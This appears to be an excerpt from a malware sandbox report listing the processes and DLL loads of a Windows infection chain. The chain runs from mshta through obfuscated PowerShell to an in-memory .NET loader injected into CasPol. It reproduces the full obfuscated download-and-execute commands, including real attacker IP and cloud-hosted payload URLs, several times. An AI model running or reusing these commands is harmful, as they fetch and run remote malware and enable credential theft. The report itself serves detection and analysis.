                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
